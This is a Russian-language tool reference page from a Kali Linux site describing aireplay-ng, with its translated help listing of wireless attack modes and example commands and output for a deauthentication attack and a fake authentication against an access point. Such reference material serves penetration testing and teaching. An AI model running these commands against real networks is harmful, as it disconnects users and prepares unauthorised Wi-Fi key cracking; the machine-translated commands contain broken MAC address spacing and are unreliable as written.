//kalinux.info
Wireless Attacks 243 просмотров

Aireplay-ng

Описание Aireplay-ng

Aireplay-ng входит в пакет aircrack-ng и используется для ввода беспроводных кадров. Его основная роль - генерировать трафик для последующего использования в aircrack-ng для взлома ключей WEP и WPA-PSK. В Aireplay-ng есть много атак, которые могут идентифицировать беспроводных клиентов с целью захвата данных рукопожатия WPA, поддельных аутентификаций, интерактивного пакетного воспроизведения, ручного запроса ARP-запроса и повторной закачки ARP-запроса.

aireplay-ng - вводить пакеты в беспроводную сеть для генерации трафика


root@kali:~# aireplay-ng --help

  Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

  использование: aireplay-ng <опции> <интерфейс воспроизведения >

  Параметры фильтра:

      -b bssid  : MAC-адрес, точка доступа
      -d dmac   : MAC-адрес, пункт назначения
      -s smac   : MAC-адрес, источник
      -m len    : минимальная длина пакета
      -n len    : максимальная длина пакета
      -u type   : управление рамкой, поле типа
      -v subt   : управление рамкой, поле подтипа
      -t tods   : управление кадрами, бит DS
      -f fromds : управление кадрами, от DS бит
      -w iswep  : управление кадрами, бит WEP
      -D        : отключить обнаружение AP

  Параметры воспроизведения:

      -x nbpps  : количество пакетов в секунду
      -p fctrl  : установить управляющее слово кадра (hex)
      -a bssid  : установить MAC-адрес точки доступа 
      -c dmac   : установить MAC-адрес назначения 
      -h smac   : установить исходный MAC-адрес 
      -g value  : изменить размер буфера звонка (по умолчанию: 8)
      -F        : выбрать первый соответствующий пакет

      Параметры атаки Fakeauth:

      -e essid  : установить целевой AP SSID
      -o npckts : количество пакетов в пакет (0 = auto, default: 1)
      -q sec    : секунды между keep-alives
      -Q        : отправлять запросы на повторную связь
      -y prga   : keystream для общего ключа auth 
      -T n      : exit после повторной попытки аутентификации

      Параметры атаки Arp Replay:

      -j        : вставлять пакеты FromDS

      Параметры атаки фрагментации:

      -k IP     : установить IP-адрес назначения в фрагменты
      -l IP     : установить IP-адрес источника в фрагменты

      Параметры тестовой атаки:

      -B        : активирует тест битрейта

  Параметры источника:

      -i iface  : захватить пакеты из этого интерфейса
      -r file   : извлекать пакеты из этого файла pcap
  Различные варианты:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : если канал интерфейса не может быть определен,
                              игнорировать несоответствие, необходимое для незагруженного cfg80211

  Режимы атаки (числа все еще могут использоваться):

      --deauth      count : деаутентификация 1 или всех станций        (-0)
      --fakeauth    delay : поддельная аутентификация с помощью AP     (-1)
      --interactive       : выбор интерактивной рамки                  (-2)
      --arpreplay         : стандартный повтор ARP-запроса             (-3)
      --chopchop          : дешифровать / chopchop WEP-пакет           (-4)
      --fragment          : генерирует действительный ключевой поток   (-5)
      --caffe-latte       : запросить клиента для новых IVs            (-6)
      --cfrag             : фрагменты против клиента                   (-7)
      --migmode           : атакует режим миграции WPA                 (-8)
      --test              : испытания инъекций и качество              (-9)

      --help              : Отображает этот экран использования

Примеры использования aireplay-ng

Атака деаутентификации

Запустите атаку деаутентификации ( -0 ), отправив 5 пакетов в точку беспроводного доступа ( -a 8C: 7F: 3B: 7E: 81: B6 ), чтобы отключить аутентификацию беспроводного клиента ( -c 00: 08: 22: B9: 41: A1 ) через интерфейс режима мониторинга wlan0mon.


root @ kali: ~ # aireplay-ng -0 5 -a 8C: 7F: 3B: 7E: 81: B6 -c 00: 08: 22: B9: 41: A1 wlan0mon 
12:41:56 Ожидание рамки маяка (BSSID : 8C: 7F: 3B: 7E: 81: B6) на канале 6 
12:41:57 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ]
12:41:58 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
12:41:58 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
12:41:59 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ] 
12:42:00 Отправка 64 направленного DeAuth. STMAC: [00: 08: 22: B9: 41: A1] [0 | 0 ACKs ]

Поддельная аутентификация

Запустите фальшивую проверку подлинности и повторите проверку подлинности каждые 6000 секунд ( -1 6000 ) по точке доступа ( -a F0: F2: 49: 82: DF: 3B ) с данным ESSID ( -e FBI-Van-24 ), указав наш адрес mac ( -h 3c: 46: d8: 4e: ef: aa ), используя интерфейс режима мониторинга wlan0mon.


root @ kali: ~ # aireplay-ng -1 6000 -e FBI-Van-24 -a F0: F2: 49: 82: DF: 3B -h 3c: 46: d8: 4e: ef: aa wlan0mon 
12:49: 59 Ожидание кадра маяка (BSSID: F0: F2: 49: 82: DF: 3B) на канале 6 

12:50:06 Отправка запроса на аутентификацию (открытая система)